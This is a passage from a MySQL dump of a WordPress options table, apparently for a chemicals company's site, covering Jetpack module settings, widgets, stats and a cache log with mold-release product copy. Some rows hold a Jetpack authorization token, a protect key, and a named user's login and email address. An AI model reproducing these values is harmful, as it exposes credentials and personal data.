sharing";}s:32:"052c03877dd3d296a71531cb07ad939a";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"52edecb2a75222e75b2dce4356a4efce";a:14:{s:4:"name";s:13:"Related Posts";s:11:"description";s:64:"Increase page views by showing related content to your visitors.";s:14:"jumpstart_desc";s:113:"Keep visitors engaged on your blog by highlighting relevant and new content at the bottom of each published post.";s:4:"sort";s:2:"29";s:20:"recommendation_order";s:1:"9";s:10:"introduced";s:3:"2.9";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:11:"Recommended";s:7:"feature";s:21:"Engagement, Jumpstart";s:25:"additional_search_queries";s:22:"related, related posts";}s:32:"68b0d01689803c0ea7e4e60a86de2519";a:14:{s:4:"name";s:9:"SEO tools";s:11:"description";s:50:"Better results on search engines and social media.";s:14:"jumpstart_desc";s:50:"Better results on search engines and social media.";s:4:"sort";s:2:"35";s:20:"recommendation_order";s:2:"15";s:10:"introduced";s:3:"4.4";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:18:"Social, Appearance";s:7:"feature";s:18:"Traffic, Jumpstart";s:25:"additional_search_queries";s:81:"search engine optimization, social preview, meta description, custom title format";}s:32:"8b059cb50a66b717f1ec842e736b858c";a:14:{s:4:"name";s:7:"Sharing";s:11:"description";s:37:"Allow visitors to share your content.";s:14:"jumpstart_desc";s:116:"Twitter, Facebook and Google+ buttons at the bottom of each post, making it easy for visitors to share your content.";s:4:"sort";s:1:"7";s:20:"recommendation_order";s:1:"6";s:10:"introduced";s:3:"1.1";s:7:"changed";s:3:"1.2";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:19:"Social, Recommended";s:7:"feature";s:21:"Engagement, Jumpstart";s:25:"additional_search_queries";s:141:"share, sharing, sharedaddy, buttons, icons, email, facebook, twitter, google+, linkedin, pinterest, pocket, press this, print, reddit, tumblr";}s:32:"a6d2394329871857401255533a9873f7";a:14:{s:4:"name";s:16:"Shortcode Embeds";s:11:"description";s:50:"Embed media from popular sites without any coding.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"3";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.1";s:7:"changed";s:3:"1.2";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:46:"Photos and Videos, Social, Writing, Appearance";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:245:"shortcodes, shortcode, embeds, media, bandcamp, blip.tv, dailymotion, facebook, flickr, google calendars, google maps, google+, polldaddy, recipe, recipes, scribd, slideshare, slideshow, slideshows, soundcloud, ted, twitter, vimeo, vine, youtube";}s:32:"21496e2897ea5f81605e2f2ac3beb921";a:14:{s:4:"name";s:16:"WP.me Shortlinks";s:11:"description";s:54:"Create short and simple links for all posts and pages.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"8";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.1";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:6:"Social";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:17:"shortlinks, wp.me";}s:32:"e2a54a5d7879a4162709e6ffb540dd08";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"f5c537bc304f55b29c1a87e30be0cd24";a:14:{s:4:"name";s:8:"Sitemaps";s:11:"description";s:50:"Make it easy for search engines to find your site.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"13";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"3.9";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:6:"Public";s:11:"module_tags";s:20:"Recommended, Traffic";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:39:"sitemap, traffic, search, site map, seo";}s:32:"59a23643437358a9b557f1d1e20ab040";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"6a90f97c3194cfca5671728eaaeaf15e";a:14:{s:4:"name";s:14:"Single Sign On";s:11:"description";s:46:"Secure user authentication with WordPress.com.";s:14:"jumpstart_desc";s:98:"Lets you log in to all your Jetpack-enabled sites with one click using your WordPress.com account.";s:4:"sort";s:2:"30";s:20:"recommendation_order";s:1:"5";s:10:"introduced";s:3:"2.6";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:10:"Developers";s:7:"feature";s:19:"Security, Jumpstart";s:25:"additional_search_queries";s:34:"sso, single sign on, login, log in";}s:32:"b65604e920392e2f7134b646760b75e8";a:14:{s:4:"name";s:10:"Site Stats";s:11:"description";s:44:"Collect valuable traffic stats and insights.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"1";s:20:"recommendation_order";s:1:"2";s:10:"introduced";s:3:"1.1";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:23:"Site Stats, Recommended";s:7:"feature";s:10:"Engagement";s:25:"additional_search_queries";s:54:"statistics, tracking, analytics, views, traffic, stats";}s:32:"23a586dd7ead00e69ec53eb32ef740e4";a:14:{s:4:"name";s:13:"Subscriptions";s:11:"description";s:55:"Notify your readers of new posts and comments by email.";s:14:"jumpstart_desc";s:126:"Give visitors two easy subscription options — while commenting, or via a separate email subscription widget you can display.";s:4:"sort";s:1:"9";s:20:"recommendation_order";s:1:"8";s:10:"introduced";s:3:"1.2";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:6:"Social";s:7:"feature";s:21:"Engagement, Jumpstart";s:25:"additional_search_queries";s:74:"subscriptions, subscription, email, follow, followers, subscribers, signup";}s:32:"1d978b8d84d2f378fe1a702a67633b6d";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"b3b983461d7f3d27322a3551ed8a9405";a:14:{s:4:"name";s:15:"Tiled Galleries";s:11:"description";s:61:"Display image galleries in a variety of elegant arrangements.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"24";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.1";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:17:"Photos and Videos";s:7:"feature";s:10:"Appearance";s:25:"additional_search_queries";s:43:"gallery, tiles, tiled, grid, mosaic, images";}s:32:"d924e5b05722b0e104448543598f54c0";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"36741583b10c521997e563ad8e1e8b77";a:14:{s:4:"name";s:12:"Data Backups";s:11:"description";s:54:"Off-site backups, security scans, and automatic fixes.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"32";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:5:"0:1.2";s:7:"changed";s:0:"";s:10:"deactivate";s:5:"false";s:4:"free";s:5:"false";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:0:"";s:7:"feature";s:16:"Security, Health";s:25:"additional_search_queries";s:28:"vaultpress, backup, security";}s:32:"2b9b44f09b5459617d68dd82ee17002a";a:14:{s:4:"name";s:17:"Site Verification";s:11:"description";s:58:"Establish your site\'s authenticity with external services.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"33";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"3.0";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:0:"";s:7:"feature";s:10:"Engagement";s:25:"additional_search_queries";s:56:"webmaster, seo, google, bing, pinterest, search, console";}s:32:"5ab4c0db7c42e10e646342da0274c491";a:14:{s:4:"name";s:10:"VideoPress";s:11:"description";s:44:"Powerful, simple video hosting for WordPress";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"27";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.5";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:5:"false";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:17:"Photos and Videos";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:25:"video, videos, videopress";}s:32:"60a1d3aa38bc0fe1039e59dd60888543";a:14:{s:4:"name";s:17:"Widget Visibility";s:11:"description";s:42:"Control where widgets appear on your site.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"17";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.4";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:10:"Appearance";s:7:"feature";s:10:"Appearance";s:25:"additional_search_queries";s:54:"widget visibility, logic, conditional, widgets, widget";}s:32:"174ed3416476c2cb9ff5b0f671280b15";a:14:{s:4:"name";s:21:"Extra Sidebar Widgets";s:11:"description";s:54:"Add images, Twitter streams, and more to your sidebar.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"4";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.2";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:18:"Social, Appearance";s:7:"feature";s:10:"Appearance";s:25:"additional_search_queries";s:65:"widget, widgets, facebook, gallery, twitter, gravatar, image, rss";}s:32:"28b931a1db19bd24869bd54b14e733d5";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (600200, 'jetpack_available_modules', 'a:1:{s:5:"4.4.2";a:37:{s:18:"after-the-deadline";s:3:"1.1";s:8:"carousel";s:3:"1.5";s:8:"comments";s:3:"1.4";s:12:"contact-form";s:3:"1.3";s:20:"custom-content-types";s:3:"3.1";s:10:"custom-css";s:3:"1.7";s:21:"enhanced-distribution";s:3:"1.2";s:19:"gravatar-hovercards";s:3:"1.1";s:15:"infinite-scroll";s:3:"2.0";s:8:"json-api";s:3:"1.9";s:5:"latex";s:3:"1.1";s:5:"likes";s:3:"2.2";s:6:"manage";s:3:"3.4";s:8:"markdown";s:3:"2.8";s:9:"minileven";s:3:"1.8";s:7:"monitor";s:3:"2.6";s:5:"notes";s:3:"1.9";s:10:"omnisearch";s:3:"2.3";s:6:"photon";s:3:"2.0";s:13:"post-by-email";s:3:"2.0";s:7:"protect";s:3:"3.4";s:9:"publicize";s:3:"2.0";s:13:"related-posts";s:3:"2.9";s:9:"seo-tools";s:3:"4.4";s:10:"sharedaddy";s:3:"1.1";s:10:"shortcodes";s:3:"1.1";s:10:"shortlinks";s:3:"1.1";s:8:"sitemaps";s:3:"3.9";s:3:"sso";s:3:"2.6";s:5:"stats";s:3:"1.1";s:13:"subscriptions";s:3:"1.2";s:13:"tiled-gallery";s:3:"2.1";s:10:"vaultpress";s:5:"0:1.2";s:18:"verification-tools";s:3:"3.0";s:10:"videopress";s:3:"2.5";s:17:"widget-visibility";s:3:"2.4";s:7:"widgets";s:3:"1.2";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (600203, 'do_activate', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (600204, '_transient_timeout_jetpack_https_test', '1483640564', 'no'); 
INSERT INTO `wp_options` VALUES (600205, '_transient_jetpack_https_test', '1', 'no'); 
INSERT INTO `wp_options` VALUES (600206, '_transient_timeout_jetpack_https_test_message', '1483640564', 'no'); 
INSERT INTO `wp_options` VALUES (600207, '_transient_jetpack_https_test_message', '', 'no'); 
INSERT INTO `wp_options` VALUES (600208, 'sharing-options', 'a:1:{s:6:"global";a:5:{s:12:"button_style";s:9:"icon-text";s:13:"sharing_label";s:11:"Share this:";s:10:"open_links";s:4:"same";s:4:"show";a:0:{}s:6:"custom";a:0:{}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (600209, 'stats_options', 'a:7:{s:9:"admin_bar";b:1;s:5:"roles";a:1:{i:0;s:13:"administrator";}s:11:"count_roles";a:0:{}s:7:"blog_id";b:0;s:12:"do_not_track";b:1;s:10:"hide_smile";b:1;s:7:"version";s:1:"9";}', 'yes'); 
INSERT INTO `wp_options` VALUES (600210, 'jetpack_log', 'a:3:{i:0;a:4:{s:4:"time";i:1483554190;s:7:"user_id";i:2;s:7:"blog_id";b:0;s:4:"code";s:8:"register";}i:1;a:4:{s:4:"time";i:1483554196;s:7:"user_id";i:2;s:7:"blog_id";b:0;s:4:"code";s:8:"register";}i:2;a:4:{s:4:"time";i:1483554238;s:7:"user_id";i:2;s:7:"blog_id";i:122098379;s:4:"code";s:8:"register";}}', 'no'); 
INSERT INTO `wp_options` VALUES (600211, 'jetpack_private_options', 'a:1:{s:9:"authorize";s:78:"rlBPok7Qx7FL2hpvfZEThLgRxcyuJgrQ:WSJPvLYnddLBL6uM7PsqUV94P22Y0aOq:1483554910:2";}', 'yes'); 
INSERT INTO `wp_options` VALUES (600212, 'jetpack_unique_connection', 'a:3:{s:9:"connected";i:1;s:12:"disconnected";i:1;s:7:"version";s:5:"3.6.1";}', 'yes'); 
INSERT INTO `wp_options` VALUES (600215, 'jetpack_protect_key', '27e34a14a5c484fff4efe1f9d318b3bfc99229c9', 'no'); 
INSERT INTO `wp_options` VALUES (600216, '_transient_timeout_jpp_li_bde68f0fa8c3c83bfa904adf2957bab0', '1483554322', 'no'); 
INSERT INTO `wp_options` VALUES (600217, '_transient_jpp_li_bde68f0fa8c3c83bfa904adf2957bab0', 'a:5:{s:6:"status";s:2:"ok";s:3:"msg";s:61:"{"trusted_header":"REMOTE_ADDR","segments":1,"reverse":false}";s:17:"seconds_remaining";i:60;s:16:"blocked_attempts";N;s:6:"expire";i:1483554322;}', 'no'); 
INSERT INTO `wp_options` VALUES (600218, 'widget_blog_subscription', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600219, 'widget_facebook-likebox', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600220, 'widget_wpcom-goodreads', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600221, 'widget_google_translate_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600222, 'widget_googleplus-badge', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600223, 'widget_grofile', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600224, 'widget_image', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600225, 'widget_jetpack_my_community', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600226, 'widget_rss_links', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600227, 'widget_wpcom_social_media_icons_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600228, 'widget_twitter_timeline', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600229, 'widget_jetpack_display_posts_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600231, 'jetpack_portfolio', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (600232, 'sharedaddy_disable_resources', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (600233, 'jetpack_testimonial', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (600264, 'jpsq_sync_checkout', '0:0', 'no'); 
INSERT INTO `wp_options` VALUES (600265, 'jetpack_next_sync_time_full-sync-enqueue', '1483555031', 'yes'); 
INSERT INTO `wp_options` VALUES (600267, 'jetpack_active_plan', 'a:6:{s:10:"product_id";i:2002;s:12:"product_slug";s:12:"jetpack_free";s:18:"product_name_short";s:4:"Free";s:10:"free_trial";b:0;s:7:"expired";b:0;s:13:"user_is_owner";b:0;}', 'yes'); 
INSERT INTO `wp_options` VALUES (600269, '_transient_timeout_jpp_li_f29e47ea6fe6b024b0fff51b7e2f0bf8', '1483554333', 'no'); 
INSERT INTO `wp_options` VALUES (600270, '_transient_jpp_li_f29e47ea6fe6b024b0fff51b7e2f0bf8', 'a:5:{s:6:"status";s:2:"ok";s:3:"msg";s:61:"{"trusted_header":"REMOTE_ADDR","segments":1,"reverse":false}";s:17:"seconds_remaining";i:60;s:16:"blocked_attempts";N;s:6:"expire";i:1483554333;}', 'no'); 
INSERT INTO `wp_options` VALUES (600271, '_transient_timeout_jpp_headers_updated_recently', '1483640673', 'no'); 
INSERT INTO `wp_options` VALUES (600272, '_transient_jpp_headers_updated_recently', '1', 'no'); 
INSERT INTO `wp_options` VALUES (600273, 'trusted_ip_header', 'O:8:"stdClass":3:{s:14:"trusted_header";s:11:"REMOTE_ADDR";s:8:"segments";i:1;s:7:"reverse";b:0;}', 'no'); 
INSERT INTO `wp_options` VALUES (600279, '_transient_timeout_jetpack_is_single_user', '1483597473', 'no'); 
INSERT INTO `wp_options` VALUES (600280, '_transient_jetpack_is_single_user', '2', 'no'); 
INSERT INTO `wp_options` VALUES (600310, 'post_by_email_address2', 'NULL', 'yes'); 
INSERT INTO `wp_options` VALUES (600311, 'monitor_receive_notifications', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (600313, '_transient_timeout_jetpack_connected_user_data_2', '1483640686', 'no'); 
INSERT INTO `wp_options` VALUES (600314, '_transient_jetpack_connected_user_data_2', 'a:5:{s:2:"ID";i:115164932;s:5:"login";s:7:"zayyanc";s:5:"email";s:21:"zchowdhury@mschem.com";s:10:"site_count";i:1;s:15:"jetpack_connect";s:0:"";}', 'no'); 
INSERT INTO `wp_options` VALUES (600315, 'jetpack_restapi_stats_cache', 'a:1:{s:32:"bffb9561462897115b94065d91bedec3";a:1:{i:1483554291;O:8:"stdClass":3:{s:4:"date";s:10:"2017-01-04";s:5:"stats";O:8:"stdClass":19:{s:14:"visitors_today";i:0;s:18:"visitors_yesterday";i:0;s:8:"visitors";i:0;s:11:"views_today";i:0;s:15:"views_yesterday";i:0;s:14:"views_best_day";s:0:"";s:20:"views_best_day_total";i:0;s:5:"views";i:0;s:8:"comments";i:0;s:5:"posts";i:0;s:14:"followers_blog";i:0;s:18:"followers_comments";i:0;s:18:"comments_per_month";i:0;s:31:"comments_most_active_recent_day";s:0:"";s:25:"comments_most_active_time";s:3:"N/A";s:13:"comments_spam";i:0;s:10:"categories";i:0;s:4:"tags";i:0;s:6:"shares";i:0;}s:6:"visits";O:8:"stdClass":3:{s:4:"unit";s:3:"day";s:6:"fields";a:3:{i:0;s:6:"period";i:1;s:5:"views";i:2;s:8:"visitors";}s:4:"data";a:1:{i:0;a:3:{i:0;s:10:"2017-01-04";i:1;i:0;i:2;i:0;}}}}}}', 'no'); 
INSERT INTO `wp_options` VALUES (600321, 'gravatar_disable_hovercards', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (600323, 'safecss_add', '', 'yes'); 
INSERT INTO `wp_options` VALUES (600324, 'safecss_revision_migrated', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (600325, 'safecss', '', 'yes'); 
INSERT INTO `wp_options` VALUES (600354, '_transient_timeout_jpp_li_33f9f84a981411b5d617f44448fc937e', '1483558203', 'no'); 
INSERT INTO `wp_options` VALUES (600355, '_transient_jpp_li_33f9f84a981411b5d617f44448fc937e', 'a:5:{s:6:"status";s:12:"blocked-hard";s:3:"msg";s:44:"This IP is currently blocked (41.140.12.253)";s:17:"seconds_remaining";i:3573;s:16:"blocked_attempts";N;s:6:"expire";i:1483558203;}', 'no'); 
INSERT INTO `wp_options` VALUES (600361, 'wpabtf_version', '2.7.6', 'no'); 
INSERT INTO `wp_options` VALUES (600362, 'WpFcDeleteCacheLogs', '[{"date":"25-01-2017 @ 14:02:13","via":{"function":"deactivate"}},{"date":"17-01-2017 @ 19:48:35","via":{"args":["publish","draft",{"ID":3480,"post_author":"2","post_date":"2017-01-17 19:48:35","post_date_gmt":"2017-01-17 19:48:35","post_content":"","post_title":"Release Agents","post_excerpt":"","post_status":"publish","comment_status":"closed","ping_status":"closed","post_password":"","post_name":"release-agents","to_ping":"","pinged":"","post_modified":"2017-01-17 19:48:35","post_modified_gmt":"2017-01-17 19:48:35","post_content_filtered":"","post_parent":0,"guid":"https:\\/\\/www.miller-stephenson.com\\/?post_type=dp_template&#038;p=3480","menu_order":0,"post_type":"dp_template","post_mime_type":"","comment_count":"0","filter":"raw"}],"function":"on_all_status_transitions"}},{"date":"17-01-2017 @ 17:48:56","via":{"args":["publish","publish",{"ID":455,"post_author":"1","post_date":"2016-08-18 15:44:44","post_date_gmt":"2016-08-18 15:44:44","post_content":"[row]\\r\\n\\r\\n[col span=\\"6\\"]\\r\\n\\r\\n[ux_banner height=\\"600px\\" bg=\\"523\\" link=\\"https:\\/\\/www.miller-stephenson.com\\/chemicals\\/release-agents\\/semi-permanent\\/\\"]\\r\\n\\r\\n[text_box width=\\"45\\" width__sm=\\"60\\" scale=\\"123\\" animate=\\"fadeIn\\" position_x=\\"100\\" position_y=\\"20\\" text_align=\\"left\\"]\\r\\n\\r\\n[title style=\\"center\\" text=\\"Semi-Permanent Mold Release\\" size=\\"88\\"]\\r\\n<h1><strong>ReleaSys<\\/strong><\\/h1>\\r\\n<strong><em>Miller-Stephenson\\u00a0Exclusive Product<\\/em><\\/strong><a class=\\"button alt-button white\\" title=\\"\\" href=\\"..\\/chemicals\\/release-agents\\/semi-permanent\\/\\">ReleaSys Product Line<\\/a>\\r\\n\\r\\n[\\/text_box]\\r\\n\\r\\n[\\/ux_banner]\\r\\n\\r\\n[\\/col]\\r\\n[col span=\\"6\\"]\\r\\n<h3>ReleaSys Semi-Permanent Mold Release<\\/h3>\\r\\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience. \\u00a0ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations. \\u00a0Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\\r\\n<ul>\\r\\n \\t<li>Cost-Effective, Efficient Release<\\/li>\\r\\n \\t<li>Lower rejection rates and Higher quality parts<\\/li>\\r\\n \\t<li>Superior Durability and Surface Adhesion<\\/li>\\r\\n \\t<li>Low Levels of Mold Fouling<\\/li>\\r\\n \\t<li>Minimized transfer<\\/li>\\r\\n<\\/ul>\\r\\n[button text=\\"Download ReleaSys Product Guide\\" style=\\"primary\\" link=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/08\\/ReleaSys-Product-Guide-1.pdf\\"]\\r\\n\\r\\n[\\/col]\\r\\n\\r\\n[\\/row]","post_title":"ReleaSys Introduction","post_excerpt":"","post_status":"publish","comment_status":"closed","ping_status":"closed","post_password":"","post_name":"releasys-release-agent","to_ping":"","pinged":"","post_modified":"2017-01-17 17:48:56","post_modified_gmt":"2017-01-17 17:48:56","post_content_filtered":"","post_parent":0,"guid":"https:\\/\\/132.148.10.86\\/wordpress\\/?page_id=455","menu_order":0,"post_type":"page","post_mime_type":"","comment_count":"0","filter":"raw","page_template":"default"}],"function":"on_all_status_transitions"}},{"date":"16-01-2017 @ 20:29:58","via":{"args":["publish","publish",{"ID":1525,"post_author":"3","post_date":"2016-09-12 15:13:02","post_date_gmt":"2016-09-12 15:13:02","post_content":"<h3>Mold Release Agent: Which is right for you?<\\/h3>\\n<p>Mold release agents\\u00a0provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured\\u00a0part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that \\u00a0engineers understand what types of mold release agent are available and which variant would compliment their production method. \\u00a0There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes. \\u00a0Critical criteria for each release agent to meet is the following:<\\/p>\\n<ul>\\n<li>Surface adhesion and durability<\\/li>\\n<li>Ability to form a thin-film<\\/li>\\n<li>Sufficient\\u00a0surface slip<\\/li>\\n<li>Chemical inertness to the molding process and molding substrate<\\/li>\\n<li>Number of releases per application<\\/li>\\n<\\/ul>\\n<p>Release agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found. \\u00a0Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness. \\u00a0Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part. \\u00a0This result in time-consuming cleaning of the molded part. \\u00a0Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect \\u00a0more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.<\\/p>\\n<p>Miller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane based release agents. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of flucuations in the market. \\u00a0In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.<\\/p>\\n<p><a href=\\"https:\\/\\/www.miller-stephenson.com\\/chemicals\\/release-agents\\/ptfe-release-agent\\/\\"><strong>PTFE Dry Film Release Agents<\\/strong><\\/a><\\/p>\\n<p>[caption id=\\"attachment_1559\\" align=\\"alignleft\\" width=\\"256\\"]<img class=\\"wp-image-1559\\" src=\\"https:\\/\\/www.miller-stephenson.com\\/wp-content\\/uploads\\/2016\\/09\\/PTFE-mold-release-800x678.jpg\\" alt=\\"ptfe-mold-release\\" width=\\"256\\" height=\\"216\\" \\/> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href=\\"https:\\/\\/www.miller-stephenson.com\\/product\\/ptfe-release-agent\\/\\">MS-122AV<\\/a><\\/strong>[\\/caption]<\\/p>\\n<p>Miller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers\\u00a0to achieve ultra-uniform dry, thin\\u00a0films that\\u00a0exhibit excellent surface adhesion and durability. 